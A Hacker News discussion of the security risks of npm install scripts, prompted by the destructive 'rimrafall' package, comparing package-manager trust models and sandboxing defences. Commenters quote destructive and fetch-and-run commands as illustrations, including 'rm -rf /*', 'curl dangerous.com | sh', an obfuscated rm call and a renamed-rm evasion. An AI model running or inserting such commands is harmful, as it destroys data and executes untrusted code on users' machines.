Npm install could be dangerous (github.com)
122 points by joaojeronimo on Jan 26, 2015 | 97 comments



This applies to pretty much every pkg manager ever created.

That's why it's important to have end-to-end package signing with a reasonable UI, so people can choose to selectively trust the sources they need and get alerted before new dependencies get pulled in.

Sadly I don't know of any pkg manager that implements this correctly.


I find the apt package model to be very good (add trusted keys & repositories explicitly). What do you see as the shortcomings of apt compared to your ideal?
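
(For anyone unfamiliar, that model looks roughly like this; the repository URL and key filename below are only illustrative:)

    # sketch of the apt trust model: the admin explicitly adds a repo and its signing key
    echo 'deb http://mirrors.kernel.org/debian wheezy main' | sudo tee /etc/apt/sources.list.d/example.list
    sudo apt-key add example-repo-key.asc
    sudo apt-get update   # Release file signatures are now checked against that key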


Yes, apt is indeed one of the best we have (the one-eyed amongst the blind).

Sadly it's still using a flawed[1] trust model where you trust repositories rather than publishers. And the UI-shim over GnuPG is 'basic' at best (to put it politely).

To add insult to injury, deb/dpkg itself actually does contain a mechanism for package-level signing. But as far as I know no distro is using it.

To add even more insult to injury, all mobile platforms and both Windows and OSX have more reasonable package security models than Linux today.

[1] This is fine for guarding against compromised mirrors - and not much else.


The signing used by pacman (on arch) seems relatively nice, in that individual packages are signed by the maintainer rather than the repository.

Whether or not this buys you any extra security, I'm not sure. In reality I don't think many users check maintainer keys when asked if they want to trust them, but they could.


I'm not OP, but my opinion would be that APT does do some things better than npm etc., but there are still some potential problems.

Probably one of the most obvious is that access to the repos is over unencrypted HTTP connections, which opens the process up to tampering (depending on the attacker), for example injecting an older version of a package with a known security issue.


> for example injecting an older version of a package with a known security issue

There's a limited window during which an attack like this will work. If you look at one of the Release files [1], you'll notice the pseudo-header:

    Valid-Until: Wed, 04 Feb 2015 16:41:23 UTC
After this date passes, aptitude update will fail, warning you that your sources are out of date, with a message like:

    E: Release file for http://mirrors/debian/dists/wheezy-updates/Release is expired (invalid since 1h 24min 32s). Updates for this repository will not be applied.
Of course, the Release file is signed, so you can't just forge that pseudo-header (or change any of the packages in the release).

You could also choose one of the mirrors that supports HTTPS, like mirrors.kernel.org or mirrors.ocf.berkeley.edu (both good for Bay Area folks).

(Granted, the window is probably larger than we'd like, though you could write a script to check that if you wanted. Something like [2] would work.)
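
(To eyeball the window by hand, something like this works; the mirror path is just an example:)

    # print the expiry header from a repo's signed Release file
    curl -s http://mirrors.ocf.berkeley.edu/debian/dists/wheezy-updates/Release | grep '^Valid-Until'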

[1] http://mirrors.ocf.berkeley.edu/debian-security/dists/wheezy... [2] https://github.com/ocf/puppet/blob/master/modules/ocf_mirror...


I'm fairly certain there's some protection against that sort of attack. A quick Google brings me to [1], which seems to indicate that the Release file has a 7-day expiration period. Having apt connect over unencrypted HTTP allows for caching options that npm doesn't. It's also not dependent on the shitty SSL CA system.

[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=499897


I guess it's actually the package distribution that makes the difference: an apt package such as rimrafall would never reach an official Debian repository. So in the context of adversarial package code execution, the weak spot is actually the npm registry policy and not npm packaging itself.


> This applies to pretty much every pkg manager ever created.

For what it's worth, the package manager for Dart does not have this problem. We specifically didn't add support for any kind of post-install hook because executing arbitrary code from transitive dependencies feels a little fishy to me, and I'm not at all a security person.

Unfortunately, there are lots of good uses for post-install hooks too. It's a hard problem.


> This applies to pretty much every pkg manager ever created.

This seems a bit more dangerous... to do this with apt, you need to MITM, since the Debian repos are ultimately checked by ftpmasters to make sure (amongst other things) that packages like rimrafall don't get in. Apt also has mitigations against MITM, as described elsewhere in this thread.

Who's checking what packages make it into npm? How did rimrafall get accepted as a package?


What do you find wrong with yast/zypper's RPM repo signing methods? I've never seen it add a repo without prompting to accept the signing keys before adding it.


> This applies to pretty much every pkg manager ever created.

(noob question) Does it apply to PyPI/pip also?


Yes, the packages that pip installs contain a setup.py (created by the package author) and pip will run that as you when you're doing your pip install. The setup.py could do arbitrary bad things to you, like leaking your ssh keys, deleting your files, or whatever.


RPM.


If you run npm as root, npm will run scripts as the user "nobody" by default. This means that npm doesn't run scripts as root even if you run "npm install" as root.

You can set another user instead of nobody with the "user" option, and you can disable the UID/GID switching using the "unsafe-perm" option, but DO NOT DO THIS.

More information here: https://docs.npmjs.com/misc/config
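
(For illustration, the relevant options can be set like this; these are the option names documented at that link, and the values shown are only illustrative:)

    # keep lifecycle scripts running as an unprivileged user when npm itself runs as root
    npm config set user nobody
    npm config set unsafe-perm false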

edit: added more details.


This is exactly why I think modern kernel-level security layers, such as FreeBSD jails (or Docker/LXC), were born. Provided your app runs within a jail, it wouldn't matter much anymore:

> Once inside the jail, a process is not permitted to escape outside of this subtree

You could also develop within isolation, therefore your development env would be safer and even similar to a production environment. Needless to say, that has additional benefits.
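
(As a rough sketch of the idea, assuming Docker and the official node image; a malicious install script can then only touch the mounted project directory:)

    # run the install in a throwaway container; only the project dir is exposed to it
    docker run --rm -v "$PWD":/app -w /app node:0.10 npm install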


I always develop inside a virtual machine, with a shared folder in between so I can write code on the host, but everything runs in the guest.
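
(With Vagrant, for instance, that workflow is roughly the following; the box name is purely illustrative:)

    # edit code on the host, run everything in the guest via the default /vagrant synced folder
    vagrant init ubuntu/trusty64
    vagrant up
    vagrant ssh -c 'cd /vagrant && npm install && npm test'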


That's also a good solution, I think. One of the main advantages of using containers, though, is real portability. This means in theory you could just push your container from development into production without too much hassle or making administrators nervous :) That's not the same level of portability a full VM would give you.

Admittedly this is more of a discussion about containers and security than npm itself but I'm interested in discovering the options out there. I may attempt to move all my stuff to containers for a bit and write about my findings.


I have found out the hard way that a `rm -rf /*` will delete the contents of the `/vagrant/` shared folder...

Huzzah for git.


npmjs still contains the package: https://www.npmjs.com/search?q=rimrafall https://www.npmjs.com/package/rimrafall

'0 downloads in the last month'

There is no 'report package' button. The support link goes to a 'we are hiring' contact form. Report bad packages as security issues? https://www.npmjs.com/security

Package signing. Review process. Scanning tools for dangerous packages. As a user, don't trust anything and isolate with containers and jails. Ban bad actors. Charge for a curated package index.

Lots of other plugin stores do better than npm.


"Scanning tools for dangerous packages"

This seems like an impossible problem (essentially the halting problem). On Linux perhaps you could build packages in a container then copy the results to the installation directory, but there's no guarantee require("rimrafall") won't just "child_process.exec('rm -rf /')".


At the very least, they could install packages in a VM and check that the VM can be rebooted.


Then someone could just craft a package that deletes every file except the ones required for booting...


I had the same thing - they have an abuse@ email in the Code of Conduct link that appears on every page. The email is the first thing listed. I've contacted them.


The package has now been removed.


That's interesting. Any pointers to package stores that do a better job on security? I'm researching the area a bit at the moment and I've not seen a lot of good practice out there, so it would be interesting to have some good examples to hold up.


Fedora and RHEL have had mandatory signing since before either existed (back when it was RHL).

Debian has had what we'd these days call 'EV'-level security for about 15 years - people bringing their passports in and reading out their GPG public keys at LUGs.


We haven't developed far enough for a package store at this point, but this is one of the use cases we're hoping to explore as part of our capability-based shell scripting language: shill-lang.org.


Cool. If you're looking for thoughts about threat models and ways to do it, http://theupdateframework.com/index.html seems to have some good info.


> […] as dangerous as `curl dangerous.com | sh`.

dangerous.com appears to be a saucy outfits retailer. Irrespective of the name, piping the html to sh is probably fine.


I often wonder about the results of people using functional hostnames in their examples. Most PoC exploit code uses "target.com" as a placeholder, which makes sense, but hilariously that is also the hostname of US retailer Target...


This is exactly the reason example.com exists


Yep. RFC 2606 is what they should use. And if you need to specify two hosts, you can use example.net and example.org as well.

Unfortunately, the example domains don't convey context very well, so we see things like target.com, victim.com, etc


This can be corrected by target.example.com and victim.example.com. Conveys the context while remaining safe as an example.


That generally works, although in some cases it makes a difference whether two hosts are on the same tld; at the very least, it implies a connection between the two that may not always make sense (why is aggressor.example.com attacking victim.example.com?).


The same goes for TEST-NET (192.0.2.0/24), TEST-NET-2 (198.51.100.0/24), TEST-NET-3 (203.0.113.0/24), MCAST-TEST-NET (233.252.0.0/24), and the IPv6 documentation-only prefix (2001:db8::/32).


But of course they could do some fancy user agent check to only give malicious stuff when requested by curl.


Heh. Check out http://hashbang.sh - it's both HTML and shell script :)


It's always been amateur hour over there. The 'official' install was `curl http://npmjs.org/install.sh | sh`[1], package checksums aren't uniformly checked, the list goes on.

But don't worry guys, they had a security audit[2].

[1] http://web.archive.org/web/20101228041356/http://npmjs.org/ [2] http://blog.npmjs.org/post/80277229932/newly-paranoid-mainta...


I could just as easily embed something like that in any code on any open source project in any language as part of the installer or the main code base.


It doesn't even have to be intentional malice:

https://news.ycombinator.com/item?id=8896186

https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issue...

You can limit the damage by keeping backups, and running software you don't really trust under a limited account. The latter is understandably more difficult with certain applications, but it's once again one of those security-usability tradeoffs.

I basically avoid installing much in the way of new software as much as I can, as my existing setup does what I need, and anything new gets subjected to careful scrutiny first, but this is not a workable solution for everyone. Nevertheless, I can see how those with an attitude that makes them very eager to install and try new software could also make them more vulnerable to things like this.


Bingo... pretty trivial to stick an `rm -rf /*` shell call somewhere in your code. Not sure what difference it makes whether it's in a package manager file, or the code. Lesson... read the code before running it.

Title of the post should be "Running code you haven't read can be dangerous"


A lot of people using package managers, though, might think that someone else has read the code that's about to be installed (so they don't have to read it before installing it). I've installed five or six things for development work using pip recently and I would have been shocked if they were malicious (or if I had to read thousands of lines of Python to make sure they weren't malicious).


It is interesting, the contrast in cultures between developers and "hackers". It was not uncommon to hear about script kiddies picking up code and realizing later that an rm -rf line was contained in the file. The common reaction to a scenario like that would be: well, the script kid got what he deserved. (There is a fringe within that group that is more interested in testing these things in VMs, so the damage would be minimal in that case.) However, when a security issue like this is brought to light and the only difference is the intentions of the user, the arguments are completely different. Script kid downloads an rm -rf script and runs it: HAHA! JavaScript developer downloads a package and runs it blindly: "well, who let that happen and how do we stop it from happening again?" Hopefully some HN reader can respond to this and succinctly convey the philosophical mechanism going on here, as I cannot quite place it.


Maybe the script kids think that they're playing One-Shot Prisoner's Dilemma (or occasionally Iterated Prisoner's Dilemma) and the developers think they're playing some other game?


Thanks for the reference, schoen - this is why I love HN. I sometimes have difficulty organizing thoughts into neatly categorized theories like this; the best I can usually do is realize that I'm sure somebody has thought about this before and explained it better than I can.


Somehow I feel like using something that just simulates rm -rf /* would have gotten the point across just as well and a bit more safely...


But not as fun


Agreed, this is irresponsible.


There are warnings even in the description of the package:

    "name": "rimrafall",
    "version": "1.0.0",
    "description": "rm -rf /* # DO NOT INSTALL THIS",
How would you accidentally rm rf yourself with this?

A github issue "should" have sufficed, but it often doesn't. A practical demonstration is powerful enough to trigger immediate action.


Just another reason to install nodejs with a node version manager like nvm or n... or to chown your /usr dir so you don't have to run sudo every time you want to npm install. Since you need superuser privileges to accidentally remove your system on most Linux distros, it really helps if you don't form the habit of sudo npm installing everything.
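
(A sketch of what that looks like with nvm, assuming nvm is already installed; the version and package name are just examples:)

    # node and all global modules live under ~/.nvm, so no sudo is ever needed
    nvm install 0.10
    nvm use 0.10
    npm install -g grunt-cli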


I use n, but this would still try and delete everything it could - n doesn't chroot / contain/ zone / docker / rocket anything AFAIK.



Which will unfortunately prevent you from running sudo in the future, at least on Ubuntu. /usr/bin/sudo must be owned by uid 0.


Any package manager, especially one with fuzzy matching, is extremely dangerous. Every time you do an install you are often pulling hundreds of modules from many, many places. If any one of the codebases of a module were compromised, even by a sneaky contributor, you could inject arbitrary code into any company's codebase/runtime.

Until object capability type systems become more popular, this will always be an issue. Unless you hand audit everything. Good luck being productive doing that, if you even have the skills or team members able to audit code.


It's not just Npm, RubyGems has essentially the same issue. I think the real lesson is "be careful what you install".


But do they need to have the issue? Why allow running arbitrary commands during install?

To me it is less about someone purposely including malicious code (since yes, that could be in the project itself, not just the install) and more that this willy-nilly form of package managing opens people up to mistakes moving files around that do harm by accident.

And it gets even worse if the package is able to be added to a repo, like npmjs.org, and not have to be accepted after being reviewed.


There's not much difference between running a command on install and using an open source library. It's just as easy to hide `exec("r" + "m" + " -r" + "f" + " .")` in source.


Rust/Cargo, homebrew, probably a host of others.


Homebrew is at least curated, and every time you update you see several packages removed.


Well, to rubygems's credit, they know post-install scripts are a bad idea and they don't support them. The only way to do that in a gem is a hack based on extconf.rb (the original intent of this file being to compile native extensions).

But yes ultimately you are right.


This is a problem with most/all lib installers. They tend to have hooks to allow post-install actions and those hooks tend to be able to run OS commands, with the privileges of the installing user.

Of course what's extra worrying is it's not just the libs you directly install, but all their dependencies which get to carry out these actions. So for example when you install rails, it will install quite a large number of subsidiary gems.

Then add in the fact that the credentials that control dev access to push to places like rubygems and npm are just static username/password combos (which sometimes get stored in plain text in a dot file in the developer's home dir), and that there's no common use of digital signing for published libs (in some cases the installers don't even support it).


Well, even if it weren't a post/pre-install script, a node library itself can fork that exact command, upload your home directory, etc.

That's actually the reason it isn't only dangerous when run as root. Many people have huge amounts of sensitive information and data accessible with their own read and write permissions.

A library could of course also fetch even more data. One could create an npm based botnet.


There are some things you can do to make `rm` safer which would prevent this from working: https://github.com/sindresorhus/guides/blob/master/how-not-t...

Though the real fix is doing development in a sandboxed container.
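
(A couple of guard rails along those lines, as a sketch; -I is GNU rm only, and safe-rm is a separate wrapper package:)

    # prompt before removing more than three files or when deleting recursively
    alias rm='rm -I'
    # or route rm through a wrapper that refuses to touch protected paths
    sudo apt-get install safe-rm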



It works with the bash shell that comes with Git for Windows.


So this doesn't strike me as an npm issue but something more fundamental: there is no easy way on any platform to define a set of rules for processes I invoke via the command line.

Like, it would be really really nice if I could wrap npm so it can only write to $HOME/.npm, /tmp and the current working directory - but I know of no system which will currently let me do that suitably dynamically.


Sudo and ACLs. There's a lot of power in there under the hood that a lot of people don't think of with these types of problems. For your specific use case, I'd start by creating a new user, something like $USER-npm-install. Next, I'd set acls on $HOME/.npm to allow write access with setfacl, something like setfacl -m u:$USER-npm-install:rwx $HOME/.npm .

For the actual script, I'd have it check to make sure that the current working directory is owned by you, then have it setfacl -m u:$USER-npm-install:rwx . to temporarily give the installer user access, then do sudo -u $USER-npm-install npm install Whatever . After it's done, I'd do sudo chown -R $USER . to get everything owned by you, and setfacl -m u:$USER-npm-install:--- . to revoke the permissions until needed for next time.

If my brain were suitably in gear, I'd give more than a 20000 foot view of what needs to be done, but those are the basics. A lot of people think of sudo as just being something for getting to root, but it is rather useful for creating sandboxed users for potentially dangerous actions as well. Create a user with just enough privileges to do what needs to be done, and have fun.
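
(Pulling those steps together into one sketch; the sandbox user name follows the convention above and is only an example:)

    # one-time setup: a dedicated low-privilege user plus write access to the npm cache
    sudo useradd --system "$USER-npm-install"
    setfacl -m u:"$USER-npm-install":rwx "$HOME/.npm"

    # per-project: grant access, install, reclaim ownership, revoke access
    setfacl -m u:"$USER-npm-install":rwx .
    sudo -u "$USER-npm-install" npm install some-package
    sudo chown -R "$USER" .
    setfacl -m u:"$USER-npm-install":--- .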


SELinux, AppArmor, Tomoyo, and RBAC already do this. They will need some configuration though if you want to use them with binaries in your home directory.


Unix user permissions take care of that.


Kinda. It would be nicer to limit permissions on a per-"application" level, requiring one-time explicit grants from the user, kinda like how a lot of platforms already do it (web browsers, Android APK, etc).


> It would be nicer to limit permissions on a per-"application" level, requiring one-time explicit grants from the user

Most services run under their own username/group for exactly this reason. A user should only be able to obliterate their `$HOME` folder and nothing else, and if you run npm as a certain user, you can restrict that even further by setting the right permissions. If you still need further protection from accidental deletions, it's probably a good idea to use a filesystem with snapshot support like ZFS or BTRFS.

Very few programs should be run as root, and developers should know this. Random scripts pulled from the internet are not on that list. If you absolutely need to be logged in as root, then it's probably best you run npm as a different user (runuser -l username -c command). I cannot imagine any reason why you would need to run `npm install` as root. Global packages? Perhaps users should chmod their global npm modules folder to allow installing as an unprivileged user, or at least as the npm user, and then run npm as that user. My global npm packages folder is owned by the npm user/group, and if I need to install a global npm package I usually run it as `runuser -l npm -c npm install -g ...` (or sudo -u npm on OS X). It's not an extreme precaution and it's not even a hassle, and while I understand it's not the default, it's also not true that by default npm install can write or delete files outside of your home folder (unless run as root).

I'm not sure the title of this should be "npm install could be dangerous" more than "running scripts as root could be very dangerous", which is a no-brainer. The rule of thumb for users/admins in unix-like systems is to keep permissions as strict as possible.
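
(Roughly what the global-install setup described above looks like; the user name is an example, and the modules path assumes the default /usr/local prefix:)

    # create a dedicated npm user (with a usable shell so runuser -l works)
    sudo useradd -m -s /bin/bash npm
    # hand it the global modules directory
    sudo chown -R npm:npm /usr/local/lib/node_modules
    # install global packages as that user instead of root
    sudo runuser -l npm -c 'npm install -g grunt-cli'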


The problem is this doesn't tally well with the overall user experience.

I don't want my hard drive being littered with files owned by not-me, because they don't work properly when I need to rsync things and I can't change their ownership easily etc.

What I want is a kind of "sub-user": where I have sudo-like powers over files owned by my user account by default, which are then dropped for individual commands - or something similar.

Which comes back to my original point: we've got lots of mechanisms, but none of them wrap well or seamlessly around how you actually work, which makes them too much of a pain to use for the 99% of the time when everything is fine.


Slight OT: does anyone know of any hacking/malware campaigns that were specifically aimed at developers (but not against a specific company)? Normal trojans sometimes steal game keys, I could imagine searching the disk for AWS keys might be profitable, too?


Computing could be dangerous.


More of a joke but:

npm install virus.exe

Perfect for the #scalenpm tshirts

https://github.com/peny/virus.exe


Awareness of this is always good. Many now just have scripts doing `curl blah | sudo sh`, expecting that the blah URL will always serve the content they expect. Signed versions seem to be the current best way to not have problems, even though they're not perfect.

And of course, most things like npm either don't support this, don't support it well, or nobody cares about it.


The good part about npm is that if you run it with `sudo`, it will drop privileges when it's running any script in its package files. So at least those won't be run with root permissions.


Well, under no circumstance should you run npm, nvm, rvm, rbenv, pip, etc as root.


> can be as dangerous as curl dangerous.com | sh

What's dangerous.com?


Any site that serves up content that will be interpreted by `sh`.

Meaning, what happens if someone decides they want you to lose your home directory? They serve up the content "rm -rf ~". That doesn't even require privilege escalation, but it might ruin your day.


Let me rephrase:

Is dangerous.com a website famous for such a trick, or is it just an example name?


It's a name example.


It would be cool if there were a way to show which commands npm was running in its scripts.
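
(You can at least inspect a package's lifecycle scripts by hand before installing it; a sketch, using rimrafall as the example:)

    # show the scripts field straight from the registry
    npm view rimrafall scripts
    # or download the tarball and read package.json yourself
    npm pack rimrafall
    tar -xOzf rimrafall-*.tgz package/package.json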


Or if it saw anything dangerous, it'd confirm that you want to run it.

Edit: Fair points on all the comments below, pardon my ignorance :)


See Halting Problem:

http://en.wikipedia.org/wiki/Halting_problem

ELI5: it is provably impossible, in general, to tell exactly what a program is going to do without executing it.


While that may be true for an unrestricted language, it doesn't need to be true of the programs we design. There's no reason that an installer needs to be written in a completely unrestricted way. NPM could use a DSL which would make it possible to review what an installer is going to do.

This is an idea I (with some collaborators) have explored in a more general way for secure shell scripting: shill-lang.org.


For systems like rubygems and npm, a build tool that installs the gems with sudo on a clean system and flags obvious issues would be a good thing.

(If the halting problem is a problem, try executing it in a sandbox.)
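
(A crude sketch of that sandbox idea, assuming Docker; the image tag and package name are only examples:)

    # install inside a throwaway container, then list every filesystem change it made
    docker run --name pkg-audit node:0.10 sh -c 'mkdir /tmp/t && cd /tmp/t && npm install some-package || true'
    docker diff pkg-audit
    docker rm pkg-audit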


The Halting Problem says it's impossible, in general, to tell whether a program will ever finish what it's doing without actually running it.

You can obviously tell what a trivial program will do by looking at it.


The problem is that identifying a dangerous command via a blacklist ends up being pretty difficult. This is why VMs and chroots and the like end up being so useful: the best way to make sure a command only accesses what it should is usually to give it specific explicit access to the resources it should have, rather than blacklisting what it can/cannot run.


How would it catch something like

  cp /bin/rm ponies ; ./ponies -rf /


The same way checkinstall detects which files have been installed - it overrides the relevant syscalls when running the program/script: http://asic-linux.com.mx/~izto/checkinstall/installwatch.htm...

Of course, not everything is as obvious to detect as deleting files :)


Well, checkinstall acts at the dynamic linking level. If you use ASM to call the syscall directly (or more generally, a statically linked binary) then checkinstall will not even see it (strace/DTrace/ktrace would.)
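
(With strace, for example, one could watch an install for destructive calls; a sketch, and the syscall list is only illustrative:)

    # trace the install (and its children) and log file-removal syscalls
    strace -f -e trace=unlink,unlinkat,rmdir -o /tmp/install-trace.log npm install some-package
    grep -c unlink /tmp/install-trace.log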


or you can create a ponies alias, even more harmless-looking


`--verbose`


Can I do the same with Makefiles?


It's possible to write malicious Makefiles that do things like:

    install:
        rm -rf /*
If you just `git clone <evil-repo> . && make` or `git clone <evil-repo> . && sudo make install` then sure, you'll be burned too. You should always check what a build system is going to do before running it.

Most people would expect that packages from a package manager have already been checked by someone who knows what they're doing before being made available to the public though (like Debian). This is apparently not the case for npm.



